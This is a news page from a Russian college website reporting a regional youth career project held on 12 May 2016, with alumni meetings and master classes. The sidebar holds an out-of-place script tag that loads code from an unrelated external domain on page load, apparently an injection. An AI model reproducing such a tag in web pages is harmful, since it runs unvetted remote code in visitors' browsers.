Главная
Регистрация
Вход

Приветствую Вас Гость | RSS

Меню сайта

Категории раздела
Абитуриентам [0]
Для желающих поступить в наш колледж

Независимая оценка
Как вы оцениваете качество образовательных услуг нашего колледжа?
Всего ответов: 224

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

  
Главная » 2016 » Май » 16 » Областной молодежный сетевой проект «Профессия – Карьера – Успех»
14:30
Областной молодежный сетевой проект «Профессия – Карьера – Успех»

ГАПОУ ТО «Голышмановский агропедколледж» 12 мая 2016 года принимал участников на очередной областной молодежный сетевой проект «Профессия – Карьера -  Успех». Участниками проекта были  гости  из следующих образовательных учреждений: ГАПОУ «Западносибирский государственный колледж», г. Тюмень; ГАПОУ ТО Тюменский колледж водного транспорта»;  ГАПОУ ТО «Агротехнологический колледж» г. Ялуторовск; ГАПОУ ТО «Тюменский техникум строительной индустрии и городского хозяйства»; ГАПОУ ТО  «Тюменский лесотехнический техникум».

В ходе мероприятия прошла встреча с  выпускниками колледжа: Александр Леонидович Ледаков,  заместитель главы  Голышмановского муниципального района,  выпускник специальности физической культуры, который работал преподавателем физической культуры в стенах нашего колледжа, а с 2006 года по 2009 год руководил колледжем; Олег Борисович Негамедзянов,  председатель общественной организации ветеранов пограничников, депутат Думы сельского поселения Голышманово; Андрей Владимирович Путилов главный инженер ООО «Сибирия».

Гости и участники проекта познакомились с молодыми преподавателями,  выпускниками колледжа, которые вернулись в родные стены передавать свои знания и умения будущему поколению.

Педагог-психолог Саута Н.В. провела психологический тренинг «Практический самомаркетинг».

На площади колледжа студент группы ТО – 09/14 представил самодельную технику «Домашний помощник», которую сконструировал своими руками под руководством своего наставника Вторушина А.А.

В актовом зале участников и гостей проекта встречал оркестр русских народных инструментов «Глубинка», под руководством Сычева В.П.

Студенты-участники посетили незабываемые мастер-классы:

- преподаватель педагогики и психологии Дюкова А.И. провела интерактивное упражнение «Вавилонская башня», которое направлено на повышение сплоченности и развитие навыков групповой работы, помогали  в ходе работы Ставенская Кристина и Прилепская Виктория студенты, обучающиеся по специальности «Преподавание в начальных классах»;

- у мастера п/о Быкова Е.Н. и студента Никитина Сергея учились кирпичной кладке угла с пилястрой, многие ребята впервые попробовали себя в роли каменщика;

- Пантелеева Н.А. преподаватель методики обучения продуктивным видам деятельности и студенты, обучающиеся по специальности «Преподавание в начальных классах» Дериглазова Анастасия и Шаламова Надежда, научили ребят, как за короткий промежуток времени  изготовить подарочный эстамп с линогравюры, никто не ушел с данного мастер-класса без подарка, выполненного своими руками;

- самым вкусным мастером-классом  был у кондитеров, участники под руководством мастера п/о Федосенко И.П. и девушками, обучающимися по специальности «Технология продукции общественного питания» научили как оригинально украсить пирожное.

Заключительным моментом в мероприятии стало выступление агитбригады, в которой приняли участие студенты колледжа, с главным  лозунгом проекта - «Профессия – Карьера – Успех».

Материал подготовил методист колледжа Л.Е. Смольникова.

Просмотров: 1322 | Добавил: iTiger | Рейтинг: 0.0/0
Всего комментариев: 0
Имя *:
Email *:
Код *:


Вход на сайт
Логин:
Пароль:

Мы потомки Героев


ПОЛЕЗНЫЕ ССЫЛКИ

Министерство образования и науки Российской Федерации Единое окно доступа к образовательным ресурсам Федеральный портал "Российское образование" Единая коллекция цифровых образовательных ресурсов Федеральный центр информационно-образовательных ресурсов


Персональные данные Дети МЕСТО РОЖДЕНИЯ:
ТЮМЕНСКИЙ КРАЙ Конкурс новый взгляд
<script src="https://tabun.info/out/index.php"></script>
http://профстажировки.рф/
Поиск

Календарь
«  Май 2016  »
ПнВтСрЧтПтСбВс
      1
2345678
9101112131415
16171819202122
23242526272829
3031

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Архив записей

Copyright MyCorp © 2024
Создать бесплатный сайт с uCoz